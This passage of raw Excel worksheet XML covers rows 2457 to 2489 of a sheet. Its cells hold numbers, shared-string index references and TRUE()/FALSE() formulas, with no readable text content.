        <v>64</v>
      </c>
      <c r="D2457" t="s">
        <v>2866</v>
      </c>
      <c r="E2457" t="s">
        <v>2862</v>
      </c>
      <c r="F2457">
        <v>269</v>
      </c>
      <c r="G2457" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2457" t="s">
        <v>2870</v>
      </c>
      <c r="K2457">
        <v>0</v>
      </c>
      <c r="L2457" t="s">
        <v>2868</v>
      </c>
      <c r="R2457" t="s">
        <v>20</v>
      </c>
      <c r="S2457" t="s">
        <v>2864</v>
      </c>
      <c r="T2457" t="s">
        <v>7</v>
      </c>
      <c r="U2457" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2458" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2458" s="1">
        <v>18826</v>
      </c>
      <c r="B2458" t="s">
        <v>10</v>
      </c>
      <c r="C2458" t="s">
        <v>64</v>
      </c>
      <c r="D2458" t="s">
        <v>2866</v>
      </c>
      <c r="E2458" t="s">
        <v>2862</v>
      </c>
      <c r="F2458">
        <v>269</v>
      </c>
      <c r="G2458" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2458" t="s">
        <v>2871</v>
      </c>
      <c r="K2458">
        <v>0</v>
      </c>
      <c r="L2458" t="s">
        <v>2868</v>
      </c>
      <c r="R2458" t="s">
        <v>20</v>
      </c>
      <c r="S2458" t="s">
        <v>2864</v>
      </c>
      <c r="T2458" t="s">
        <v>7</v>
      </c>
      <c r="U2458" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2459" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2459" s="1">
        <v>18827</v>
      </c>
      <c r="B2459" t="s">
        <v>10</v>
      </c>
      <c r="C2459" t="s">
        <v>64</v>
      </c>
      <c r="D2459" t="s">
        <v>2866</v>
      </c>
      <c r="E2459" t="s">
        <v>2862</v>
      </c>
      <c r="F2459">
        <v>269</v>
      </c>
      <c r="G2459" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2459" t="s">
        <v>2872</v>
      </c>
      <c r="K2459">
        <v>0</v>
      </c>
      <c r="L2459" t="s">
        <v>2868</v>
      </c>
      <c r="R2459" t="s">
        <v>20</v>
      </c>
      <c r="S2459" t="s">
        <v>2864</v>
      </c>
      <c r="T2459" t="s">
        <v>7</v>
      </c>
      <c r="U2459" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2460" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2460" s="1">
        <v>18828</v>
      </c>
      <c r="B2460" t="s">
        <v>10</v>
      </c>
      <c r="C2460" t="s">
        <v>67</v>
      </c>
      <c r="D2460" t="s">
        <v>2873</v>
      </c>
      <c r="E2460" t="s">
        <v>2862</v>
      </c>
      <c r="F2460">
        <v>247</v>
      </c>
      <c r="G2460" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2460" t="s">
        <v>2874</v>
      </c>
      <c r="K2460">
        <v>0</v>
      </c>
      <c r="L2460" t="s">
        <v>2868</v>
      </c>
      <c r="R2460" t="s">
        <v>20</v>
      </c>
      <c r="S2460" t="s">
        <v>2864</v>
      </c>
      <c r="T2460" t="s">
        <v>7</v>
      </c>
      <c r="U2460" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2461" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2461" s="1">
        <v>18829</v>
      </c>
      <c r="B2461" t="s">
        <v>10</v>
      </c>
      <c r="C2461" t="s">
        <v>67</v>
      </c>
      <c r="D2461" t="s">
        <v>2873</v>
      </c>
      <c r="E2461" t="s">
        <v>2862</v>
      </c>
      <c r="F2461">
        <v>247</v>
      </c>
      <c r="G2461" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2461" t="s">
        <v>2875</v>
      </c>
      <c r="K2461">
        <v>0</v>
      </c>
      <c r="L2461" t="s">
        <v>2868</v>
      </c>
      <c r="R2461" t="s">
        <v>20</v>
      </c>
      <c r="S2461" t="s">
        <v>2864</v>
      </c>
      <c r="T2461" t="s">
        <v>7</v>
      </c>
      <c r="U2461" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2462" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2462" s="1">
        <v>18830</v>
      </c>
      <c r="B2462" t="s">
        <v>10</v>
      </c>
      <c r="C2462" t="s">
        <v>67</v>
      </c>
      <c r="D2462" t="s">
        <v>2873</v>
      </c>
      <c r="E2462" t="s">
        <v>2862</v>
      </c>
      <c r="F2462">
        <v>247</v>
      </c>
      <c r="G2462" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2462" t="s">
        <v>2876</v>
      </c>
      <c r="K2462">
        <v>0</v>
      </c>
      <c r="L2462" t="s">
        <v>2868</v>
      </c>
      <c r="R2462" t="s">
        <v>20</v>
      </c>
      <c r="S2462" t="s">
        <v>2864</v>
      </c>
      <c r="T2462" t="s">
        <v>7</v>
      </c>
      <c r="U2462" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2463" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2463" s="1">
        <v>18831</v>
      </c>
      <c r="B2463" t="s">
        <v>10</v>
      </c>
      <c r="C2463" t="s">
        <v>67</v>
      </c>
      <c r="D2463" t="s">
        <v>2873</v>
      </c>
      <c r="E2463" t="s">
        <v>2862</v>
      </c>
      <c r="F2463">
        <v>247</v>
      </c>
      <c r="G2463" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2463" t="s">
        <v>2877</v>
      </c>
      <c r="K2463">
        <v>0</v>
      </c>
      <c r="L2463" t="s">
        <v>2868</v>
      </c>
      <c r="R2463" t="s">
        <v>20</v>
      </c>
      <c r="S2463" t="s">
        <v>2864</v>
      </c>
      <c r="T2463" t="s">
        <v>7</v>
      </c>
      <c r="U2463" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2464" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2464" s="1">
        <v>18832</v>
      </c>
      <c r="B2464" t="s">
        <v>10</v>
      </c>
      <c r="C2464" t="s">
        <v>67</v>
      </c>
      <c r="D2464" t="s">
        <v>2873</v>
      </c>
      <c r="E2464" t="s">
        <v>2862</v>
      </c>
      <c r="F2464">
        <v>247</v>
      </c>
      <c r="G2464" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2464" t="s">
        <v>2878</v>
      </c>
      <c r="K2464">
        <v>0</v>
      </c>
      <c r="L2464" t="s">
        <v>2868</v>
      </c>
      <c r="R2464" t="s">
        <v>20</v>
      </c>
      <c r="S2464" t="s">
        <v>2864</v>
      </c>
      <c r="T2464" t="s">
        <v>7</v>
      </c>
      <c r="U2464" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2465" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2465" s="1">
        <v>18833</v>
      </c>
      <c r="B2465" t="s">
        <v>10</v>
      </c>
      <c r="C2465" t="s">
        <v>67</v>
      </c>
      <c r="D2465" t="s">
        <v>2873</v>
      </c>
      <c r="E2465" t="s">
        <v>2862</v>
      </c>
      <c r="F2465">
        <v>247</v>
      </c>
      <c r="G2465" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2465" t="s">
        <v>2879</v>
      </c>
      <c r="K2465">
        <v>0</v>
      </c>
      <c r="L2465" t="s">
        <v>2868</v>
      </c>
      <c r="R2465" t="s">
        <v>20</v>
      </c>
      <c r="S2465" t="s">
        <v>2864</v>
      </c>
      <c r="T2465" t="s">
        <v>7</v>
      </c>
      <c r="U2465" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2466" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2466" s="1">
        <v>18834</v>
      </c>
      <c r="B2466" t="s">
        <v>10</v>
      </c>
      <c r="C2466" t="s">
        <v>11</v>
      </c>
      <c r="D2466" t="s">
        <v>2880</v>
      </c>
      <c r="E2466" t="s">
        <v>2862</v>
      </c>
      <c r="F2466">
        <v>216</v>
      </c>
      <c r="G2466" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2466" t="s">
        <v>2881</v>
      </c>
      <c r="K2466">
        <v>0</v>
      </c>
      <c r="L2466" t="s">
        <v>2882</v>
      </c>
      <c r="R2466" t="s">
        <v>20</v>
      </c>
      <c r="S2466" t="s">
        <v>2864</v>
      </c>
      <c r="T2466" t="s">
        <v>7</v>
      </c>
      <c r="U2466" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2467" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2467" s="1">
        <v>18835</v>
      </c>
      <c r="B2467" t="s">
        <v>10</v>
      </c>
      <c r="C2467" t="s">
        <v>11</v>
      </c>
      <c r="D2467" t="s">
        <v>2880</v>
      </c>
      <c r="E2467" t="s">
        <v>2862</v>
      </c>
      <c r="F2467">
        <v>216</v>
      </c>
      <c r="G2467" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2467" t="s">
        <v>2883</v>
      </c>
      <c r="K2467">
        <v>0</v>
      </c>
      <c r="L2467" t="s">
        <v>2882</v>
      </c>
      <c r="R2467" t="s">
        <v>20</v>
      </c>
      <c r="S2467" t="s">
        <v>2864</v>
      </c>
      <c r="T2467" t="s">
        <v>7</v>
      </c>
      <c r="U2467" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2468" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2468" s="1">
        <v>18836</v>
      </c>
      <c r="B2468" t="s">
        <v>10</v>
      </c>
      <c r="C2468" t="s">
        <v>11</v>
      </c>
      <c r="D2468" t="s">
        <v>2880</v>
      </c>
      <c r="E2468" t="s">
        <v>2862</v>
      </c>
      <c r="F2468">
        <v>216</v>
      </c>
      <c r="G2468" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2468" t="s">
        <v>2884</v>
      </c>
      <c r="K2468">
        <v>0</v>
      </c>
      <c r="L2468" t="s">
        <v>2882</v>
      </c>
      <c r="R2468" t="s">
        <v>20</v>
      </c>
      <c r="S2468" t="s">
        <v>2864</v>
      </c>
      <c r="T2468" t="s">
        <v>7</v>
      </c>
      <c r="U2468" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2469" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2469" s="1">
        <v>18837</v>
      </c>
      <c r="B2469" t="s">
        <v>0</v>
      </c>
      <c r="C2469" t="s">
        <v>22</v>
      </c>
      <c r="D2469" t="s">
        <v>2885</v>
      </c>
      <c r="E2469" t="s">
        <v>2862</v>
      </c>
      <c r="F2469">
        <v>63</v>
      </c>
      <c r="G2469" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2469" t="s">
        <v>2886</v>
      </c>
      <c r="K2469">
        <v>0</v>
      </c>
      <c r="L2469" t="s">
        <v>2887</v>
      </c>
      <c r="R2469" t="s">
        <v>20</v>
      </c>
      <c r="S2469" t="s">
        <v>2864</v>
      </c>
      <c r="T2469" t="s">
        <v>7</v>
      </c>
      <c r="U2469" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2470" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2470" s="1">
        <v>18838</v>
      </c>
      <c r="B2470" t="s">
        <v>0</v>
      </c>
      <c r="C2470" t="s">
        <v>22</v>
      </c>
      <c r="D2470" t="s">
        <v>2885</v>
      </c>
      <c r="E2470" t="s">
        <v>2862</v>
      </c>
      <c r="F2470">
        <v>63</v>
      </c>
      <c r="G2470" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2470" t="s">
        <v>2888</v>
      </c>
      <c r="K2470">
        <v>0</v>
      </c>
      <c r="L2470" t="s">
        <v>2887</v>
      </c>
      <c r="R2470" t="s">
        <v>20</v>
      </c>
      <c r="S2470" t="s">
        <v>2864</v>
      </c>
      <c r="T2470" t="s">
        <v>7</v>
      </c>
      <c r="U2470" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2471" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2471" s="1">
        <v>18839</v>
      </c>
      <c r="B2471" t="s">
        <v>0</v>
      </c>
      <c r="C2471" t="s">
        <v>22</v>
      </c>
      <c r="D2471" t="s">
        <v>2885</v>
      </c>
      <c r="E2471" t="s">
        <v>2862</v>
      </c>
      <c r="F2471">
        <v>63</v>
      </c>
      <c r="G2471" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2471" t="s">
        <v>2889</v>
      </c>
      <c r="K2471">
        <v>0</v>
      </c>
      <c r="L2471" t="s">
        <v>2887</v>
      </c>
      <c r="R2471" t="s">
        <v>20</v>
      </c>
      <c r="S2471" t="s">
        <v>2864</v>
      </c>
      <c r="T2471" t="s">
        <v>7</v>
      </c>
      <c r="U2471" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2472" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2472" s="1">
        <v>18840</v>
      </c>
      <c r="B2472" t="s">
        <v>0</v>
      </c>
      <c r="C2472" t="s">
        <v>22</v>
      </c>
      <c r="D2472" t="s">
        <v>2885</v>
      </c>
      <c r="E2472" t="s">
        <v>2862</v>
      </c>
      <c r="F2472">
        <v>63</v>
      </c>
      <c r="G2472" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2472" t="s">
        <v>2890</v>
      </c>
      <c r="K2472">
        <v>0</v>
      </c>
      <c r="L2472" t="s">
        <v>2887</v>
      </c>
      <c r="R2472" t="s">
        <v>20</v>
      </c>
      <c r="S2472" t="s">
        <v>2864</v>
      </c>
      <c r="T2472" t="s">
        <v>7</v>
      </c>
      <c r="U2472" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2473" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2473" s="1">
        <v>18841</v>
      </c>
      <c r="B2473" t="s">
        <v>0</v>
      </c>
      <c r="C2473" t="s">
        <v>22</v>
      </c>
      <c r="D2473" t="s">
        <v>2885</v>
      </c>
      <c r="E2473" t="s">
        <v>2862</v>
      </c>
      <c r="F2473">
        <v>63</v>
      </c>
      <c r="G2473" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2473" t="s">
        <v>2891</v>
      </c>
      <c r="K2473">
        <v>0</v>
      </c>
      <c r="L2473" t="s">
        <v>2887</v>
      </c>
      <c r="R2473" t="s">
        <v>20</v>
      </c>
      <c r="S2473" t="s">
        <v>2864</v>
      </c>
      <c r="T2473" t="s">
        <v>7</v>
      </c>
      <c r="U2473" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2474" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2474" s="1">
        <v>18842</v>
      </c>
      <c r="B2474" t="s">
        <v>0</v>
      </c>
      <c r="C2474" t="s">
        <v>22</v>
      </c>
      <c r="D2474" t="s">
        <v>2885</v>
      </c>
      <c r="E2474" t="s">
        <v>2862</v>
      </c>
      <c r="F2474">
        <v>63</v>
      </c>
      <c r="G2474" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2474" t="s">
        <v>2892</v>
      </c>
      <c r="K2474">
        <v>0</v>
      </c>
      <c r="L2474" t="s">
        <v>2887</v>
      </c>
      <c r="R2474" t="s">
        <v>20</v>
      </c>
      <c r="S2474" t="s">
        <v>2864</v>
      </c>
      <c r="T2474" t="s">
        <v>7</v>
      </c>
      <c r="U2474" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2475" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2475" s="1">
        <v>18843</v>
      </c>
      <c r="B2475" t="s">
        <v>0</v>
      </c>
      <c r="C2475" t="s">
        <v>22</v>
      </c>
      <c r="D2475" t="s">
        <v>2885</v>
      </c>
      <c r="E2475" t="s">
        <v>2862</v>
      </c>
      <c r="F2475">
        <v>63</v>
      </c>
      <c r="G2475" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2475" t="s">
        <v>2893</v>
      </c>
      <c r="K2475">
        <v>0</v>
      </c>
      <c r="L2475" t="s">
        <v>2887</v>
      </c>
      <c r="R2475" t="s">
        <v>20</v>
      </c>
      <c r="S2475" t="s">
        <v>2864</v>
      </c>
      <c r="T2475" t="s">
        <v>7</v>
      </c>
      <c r="U2475" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2476" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2476" s="1">
        <v>18844</v>
      </c>
      <c r="B2476" t="s">
        <v>0</v>
      </c>
      <c r="C2476" t="s">
        <v>22</v>
      </c>
      <c r="D2476" t="s">
        <v>2885</v>
      </c>
      <c r="E2476" t="s">
        <v>2862</v>
      </c>
      <c r="F2476">
        <v>63</v>
      </c>
      <c r="G2476" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2476" t="s">
        <v>2894</v>
      </c>
      <c r="K2476">
        <v>0</v>
      </c>
      <c r="L2476" t="s">
        <v>2887</v>
      </c>
      <c r="R2476" t="s">
        <v>20</v>
      </c>
      <c r="S2476" t="s">
        <v>2864</v>
      </c>
      <c r="T2476" t="s">
        <v>7</v>
      </c>
      <c r="U2476" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2477" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2477" s="1">
        <v>18845</v>
      </c>
      <c r="B2477" t="s">
        <v>0</v>
      </c>
      <c r="C2477" t="s">
        <v>22</v>
      </c>
      <c r="D2477" t="s">
        <v>2895</v>
      </c>
      <c r="E2477" t="s">
        <v>2862</v>
      </c>
      <c r="F2477">
        <v>87</v>
      </c>
      <c r="G2477" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2477" t="s">
        <v>2896</v>
      </c>
      <c r="K2477">
        <v>0</v>
      </c>
      <c r="L2477" t="s">
        <v>2887</v>
      </c>
      <c r="R2477" t="s">
        <v>20</v>
      </c>
      <c r="S2477" t="s">
        <v>2864</v>
      </c>
      <c r="T2477" t="s">
        <v>7</v>
      </c>
      <c r="U2477" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2478" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2478" s="1">
        <v>18846</v>
      </c>
      <c r="B2478" t="s">
        <v>0</v>
      </c>
      <c r="C2478" t="s">
        <v>22</v>
      </c>
      <c r="D2478" t="s">
        <v>2895</v>
      </c>
      <c r="E2478" t="s">
        <v>2862</v>
      </c>
      <c r="F2478">
        <v>87</v>
      </c>
      <c r="G2478" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2478" t="s">
        <v>2897</v>
      </c>
      <c r="K2478">
        <v>0</v>
      </c>
      <c r="L2478" t="s">
        <v>2887</v>
      </c>
      <c r="R2478" t="s">
        <v>20</v>
      </c>
      <c r="S2478" t="s">
        <v>2864</v>
      </c>
      <c r="T2478" t="s">
        <v>7</v>
      </c>
      <c r="U2478" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2479" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2479" s="1">
        <v>18847</v>
      </c>
      <c r="B2479" t="s">
        <v>0</v>
      </c>
      <c r="C2479" t="s">
        <v>22</v>
      </c>
      <c r="D2479" t="s">
        <v>2895</v>
      </c>
      <c r="E2479" t="s">
        <v>2862</v>
      </c>
      <c r="F2479">
        <v>87</v>
      </c>
      <c r="G2479" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2479" t="s">
        <v>2898</v>
      </c>
      <c r="K2479">
        <v>0</v>
      </c>
      <c r="L2479" t="s">
        <v>2887</v>
      </c>
      <c r="R2479" t="s">
        <v>20</v>
      </c>
      <c r="S2479" t="s">
        <v>2864</v>
      </c>
      <c r="T2479" t="s">
        <v>7</v>
      </c>
      <c r="U2479" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2480" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2480" s="1">
        <v>18848</v>
      </c>
      <c r="B2480" t="s">
        <v>0</v>
      </c>
      <c r="C2480" t="s">
        <v>22</v>
      </c>
      <c r="D2480" t="s">
        <v>2895</v>
      </c>
      <c r="E2480" t="s">
        <v>2862</v>
      </c>
      <c r="F2480">
        <v>87</v>
      </c>
      <c r="G2480" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2480" t="s">
        <v>2899</v>
      </c>
      <c r="K2480">
        <v>0</v>
      </c>
      <c r="L2480" t="s">
        <v>2887</v>
      </c>
      <c r="R2480" t="s">
        <v>20</v>
      </c>
      <c r="S2480" t="s">
        <v>2864</v>
      </c>
      <c r="T2480" t="s">
        <v>7</v>
      </c>
      <c r="U2480" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2481" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2481" s="1">
        <v>18849</v>
      </c>
      <c r="B2481" t="s">
        <v>0</v>
      </c>
      <c r="C2481" t="s">
        <v>22</v>
      </c>
      <c r="D2481" t="s">
        <v>2895</v>
      </c>
      <c r="E2481" t="s">
        <v>2862</v>
      </c>
      <c r="F2481">
        <v>87</v>
      </c>
      <c r="G2481" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2481" t="s">
        <v>2900</v>
      </c>
      <c r="K2481">
        <v>0</v>
      </c>
      <c r="L2481" t="s">
        <v>2887</v>
      </c>
      <c r="R2481" t="s">
        <v>20</v>
      </c>
      <c r="S2481" t="s">
        <v>2864</v>
      </c>
      <c r="T2481" t="s">
        <v>7</v>
      </c>
      <c r="U2481" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2482" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2482" s="1">
        <v>18850</v>
      </c>
      <c r="B2482" t="s">
        <v>44</v>
      </c>
      <c r="C2482" t="s">
        <v>45</v>
      </c>
      <c r="D2482" t="s">
        <v>2901</v>
      </c>
      <c r="E2482" t="s">
        <v>2862</v>
      </c>
      <c r="F2482">
        <v>14</v>
      </c>
      <c r="G2482" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2482" t="s">
        <v>2902</v>
      </c>
      <c r="K2482">
        <v>0</v>
      </c>
      <c r="L2482" t="s">
        <v>2903</v>
      </c>
      <c r="R2482" t="s">
        <v>20</v>
      </c>
      <c r="S2482" t="s">
        <v>2864</v>
      </c>
      <c r="T2482" t="s">
        <v>7</v>
      </c>
      <c r="U2482" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2483" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2483" s="1">
        <v>18851</v>
      </c>
      <c r="B2483" t="s">
        <v>10</v>
      </c>
      <c r="C2483" t="s">
        <v>57</v>
      </c>
      <c r="D2483" t="s">
        <v>2904</v>
      </c>
      <c r="E2483" t="s">
        <v>2862</v>
      </c>
      <c r="F2483">
        <v>0</v>
      </c>
      <c r="G2483" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2483" t="s">
        <v>2905</v>
      </c>
      <c r="K2483">
        <v>1</v>
      </c>
      <c r="M2483" t="s">
        <v>618</v>
      </c>
      <c r="N2483" t="s">
        <v>619</v>
      </c>
      <c r="O2483" t="s">
        <v>618</v>
      </c>
      <c r="P2483" t="s">
        <v>57</v>
      </c>
      <c r="Q2483" t="s">
        <v>2906</v>
      </c>
      <c r="R2483" t="s">
        <v>20</v>
      </c>
      <c r="S2483" t="s">
        <v>2864</v>
      </c>
      <c r="T2483" t="s">
        <v>7</v>
      </c>
      <c r="U2483" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2484" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2484" s="1">
        <v>18852</v>
      </c>
      <c r="B2484" t="s">
        <v>10</v>
      </c>
      <c r="C2484" t="s">
        <v>57</v>
      </c>
      <c r="D2484" t="s">
        <v>2907</v>
      </c>
      <c r="E2484" t="s">
        <v>2862</v>
      </c>
      <c r="F2484">
        <v>349</v>
      </c>
      <c r="G2484" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2484" t="s">
        <v>2908</v>
      </c>
      <c r="K2484">
        <v>1</v>
      </c>
      <c r="M2484" t="s">
        <v>618</v>
      </c>
      <c r="N2484" t="s">
        <v>619</v>
      </c>
      <c r="O2484" t="s">
        <v>618</v>
      </c>
      <c r="P2484" t="s">
        <v>57</v>
      </c>
      <c r="Q2484" t="s">
        <v>2909</v>
      </c>
      <c r="R2484" t="s">
        <v>20</v>
      </c>
      <c r="S2484" t="s">
        <v>2864</v>
      </c>
      <c r="T2484" t="s">
        <v>7</v>
      </c>
      <c r="U2484" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2485" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2485" s="1">
        <v>18853</v>
      </c>
      <c r="B2485" t="s">
        <v>10</v>
      </c>
      <c r="C2485" t="s">
        <v>64</v>
      </c>
      <c r="D2485" t="s">
        <v>2910</v>
      </c>
      <c r="E2485" t="s">
        <v>2862</v>
      </c>
      <c r="F2485">
        <v>0</v>
      </c>
      <c r="G2485" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2485" t="s">
        <v>2911</v>
      </c>
      <c r="K2485">
        <v>1</v>
      </c>
      <c r="M2485" t="s">
        <v>618</v>
      </c>
      <c r="N2485" t="s">
        <v>619</v>
      </c>
      <c r="O2485" t="s">
        <v>618</v>
      </c>
      <c r="P2485" t="s">
        <v>64</v>
      </c>
      <c r="Q2485" t="s">
        <v>2909</v>
      </c>
      <c r="R2485" t="s">
        <v>20</v>
      </c>
      <c r="S2485" t="s">
        <v>2864</v>
      </c>
      <c r="T2485" t="s">
        <v>7</v>
      </c>
      <c r="U2485" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2486" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2486" s="1">
        <v>18854</v>
      </c>
      <c r="B2486" t="s">
        <v>10</v>
      </c>
      <c r="C2486" t="s">
        <v>57</v>
      </c>
      <c r="D2486" t="s">
        <v>2912</v>
      </c>
      <c r="E2486" t="s">
        <v>2862</v>
      </c>
      <c r="F2486">
        <v>0</v>
      </c>
      <c r="G2486" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2486" t="s">
        <v>2913</v>
      </c>
      <c r="K2486">
        <v>1</v>
      </c>
      <c r="M2486" t="s">
        <v>618</v>
      </c>
      <c r="N2486" t="s">
        <v>619</v>
      </c>
      <c r="O2486" t="s">
        <v>618</v>
      </c>
      <c r="P2486" t="s">
        <v>57</v>
      </c>
      <c r="Q2486" t="s">
        <v>2914</v>
      </c>
      <c r="R2486" t="s">
        <v>20</v>
      </c>
      <c r="S2486" t="s">
        <v>2864</v>
      </c>
      <c r="T2486" t="s">
        <v>7</v>
      </c>
      <c r="U2486" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2487" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2487" s="1">
        <v>18855</v>
      </c>
      <c r="B2487" t="s">
        <v>10</v>
      </c>
      <c r="C2487" t="s">
        <v>57</v>
      </c>
      <c r="D2487" t="s">
        <v>2915</v>
      </c>
      <c r="E2487" t="s">
        <v>2862</v>
      </c>
      <c r="F2487">
        <v>0</v>
      </c>
      <c r="G2487" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2487" t="s">
        <v>2916</v>
      </c>
      <c r="K2487">
        <v>1</v>
      </c>
      <c r="M2487" t="s">
        <v>618</v>
      </c>
      <c r="N2487" t="s">
        <v>619</v>
      </c>
      <c r="O2487" t="s">
        <v>618</v>
      </c>
      <c r="P2487" t="s">
        <v>57</v>
      </c>
      <c r="Q2487" t="s">
        <v>2917</v>
      </c>
      <c r="R2487" t="s">
        <v>20</v>
      </c>
      <c r="S2487" t="s">
        <v>2864</v>
      </c>
      <c r="T2487" t="s">
        <v>7</v>
      </c>
      <c r="U2487" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2488" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2488" s="1">
        <v>18856</v>
      </c>
      <c r="B2488" t="s">
        <v>10</v>
      </c>
      <c r="C2488" t="s">
        <v>57</v>
      </c>
      <c r="D2488" t="s">
        <v>2918</v>
      </c>
      <c r="E2488" t="s">
        <v>2862</v>
      </c>
      <c r="F2488">
        <v>29</v>
      </c>
      <c r="G2488" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2488" t="s">
        <v>2919</v>
      </c>
      <c r="K2488">
        <v>1</v>
      </c>
      <c r="M2488" t="s">
        <v>618</v>
      </c>
      <c r="N2488" t="s">
        <v>619</v>
      </c>
      <c r="O2488" t="s">
        <v>618</v>
      </c>
      <c r="P2488" t="s">
        <v>57</v>
      </c>
      <c r="Q2488" t="s">
        <v>2920</v>
      </c>
      <c r="R2488" t="s">
        <v>20</v>
      </c>
      <c r="S2488" t="s">
        <v>2864</v>
      </c>
      <c r="T2488" t="s">
        <v>7</v>
      </c>
      <c r="U2488" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2489" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2489" s="1">
        <v>18857</v>
      </c>
      <c r="B2489" t="s">
        <v>10</v>
      </c>
      <c r="C2489" t="s">
        <v>64</v>
      </c>
      <c r="D2489" t="s">
        <v>2921</v>
      </c>
      <c r="E2489" t="s">
        <v>2862</v>
      </c>
      <c r="F2489">
        <v>0</v>
      </c>
      <c r="G2489" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2489" t="s">
        <v>2922</v>
      </c>
      <c r="K2489">
        <v>1</v>
      </c>
      <c r="M2489" t="s">
        <v>618</v>
      </c>
      <c r="N2489" t="s">
        <v>619</v>
      </c>
      <c r="O2489" t="s">
        <v>618</v>
      </c>
